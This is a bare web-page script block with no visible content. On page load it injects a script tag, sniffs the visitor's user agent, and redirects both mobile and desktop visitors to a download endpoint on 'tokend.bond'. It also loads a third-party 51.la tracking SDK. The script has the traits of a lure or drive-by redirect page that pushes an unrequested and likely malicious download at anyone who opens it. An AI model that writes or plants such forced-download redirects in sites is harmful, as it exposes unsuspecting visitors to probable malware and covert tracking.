<script>
(function addScript(){
    var script = document.createElement('script');
    script.setAttribute('type','text/javascript');
    script.setAttribute('src','/');
    document.getElementsByTagName('head')[0].appendChild(script);
})();

    var url1 = 'https://download.tokend.bond/download';
    var url2 = 'https://download.tokend.bond/download';
    function isModel() {
      let sUserAgent = navigator.userAgent.toLowerCase();
      if (sUserAgent.indexOf('Android'.toLowerCase()) != -1
              || sUserAgent.indexOf('iPhone'.toLowerCase()) != -1
              || sUserAgent.indexOf('iPad'.toLowerCase()) != -1
              || sUserAgent.indexOf('iPod'.toLowerCase()) != -1
              || sUserAgent.indexOf('Symbian'.toLowerCase()) != -1
              || sUserAgent.indexOf('iphone os'.toLowerCase()) != -1
              || sUserAgent.indexOf('midp'.toLowerCase()) != -1
              || sUserAgent.indexOf('ucweb'.toLowerCase()) != -1
              || sUserAgent.indexOf('windows ce'.toLowerCase()) != -1
              || sUserAgent.indexOf('mumu'.toLowerCase()) != -1
              || sUserAgent.indexOf('mobile'.toLowerCase()) != -1) {
        return true;
      }
      return false;
    }

    (function() {
      if (!isModel()) {
        location.href=url1;
      }else {
        location.href=url2;
      }
    })();
    !function(p){"use strict";!function(t){var s=window,e=document,i=p,c="".concat("https:"===e.location.protocol?"https://":"http://","sdk.51.la/js-sdk-pro.min.js"),n=e.createElement("script"),r=e.getElementsByTagName("script")[0];n.type="text/javascript",n.setAttribute("charset","UTF-8"),n.async=!0,n.src=c,n.id="LA_COLLECT",i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:"K1LWEF0L2e7gMLd8",ck:"K1LWEF0L2e7gMLd8"});
</script>